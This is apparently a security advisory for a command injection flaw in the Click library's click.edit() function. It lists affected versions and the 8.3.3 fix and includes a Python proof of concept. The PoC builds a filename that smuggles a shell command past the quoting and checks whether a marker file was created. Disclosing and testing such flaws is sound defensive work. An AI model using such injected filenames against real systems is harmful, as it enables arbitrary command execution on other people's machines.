# Pallets Click Command Injection Vulnerability Summary ## Vulnerability Overview The `click.edit()` function in the Pallets Click library contains a command injection vulnerability. When invoking the system editor, this function fails to adequately sanitize the incoming `filename` parameter (it only wraps it in double quotes). This allows attackers to bypass quote restrictions by constructing filenames containing double quote characters, thereby injecting and executing arbitrary operating system commands. ## Affected Scope - **Affected Product**: Pallets Click - **Affected Versions**: All versions prior to 8.3.3 - **Fixed Version**: 8.3.3 - **Severity**: High (7.3 / 10) - **Vulnerability Type**: CWE-78 (OS Command Injection) ## Remediation Upgrade the Click library to version **8.3.3** or later. ## Proof of Concept (POC) ```python #!/usr/bin/env python3 import os import subprocess import click def main(): marker_file = "click_pwned_marker" malicious_filename = f'clickpoc"; touch {marker_file}; echo "' print(f"[*] Malicious filename: {malicious_filename}") try: subprocess.run(["touch", malicious_filename], check=True) print(f"[+] File exists: {os.path.exists(malicious_filename)}") except Exception as e: print(f"[-] Failed to create file: {e}") return try: result = click.edit(filename=malicious_filename, editor='true') print(f"[*] click.edit() returned: {result}") except Exception as e: print(f"[*] Exception: {e}") finally: if os.path.exists(malicious_filename): os.remove(malicious_filename) if os.path.exists(marker_file): print(f"[+] SUCCESS: marker file '{marker_file}' was created by the injected command.") else: print(f"[-] Marker file NOT created.") if __name__ == "__main__": main() ```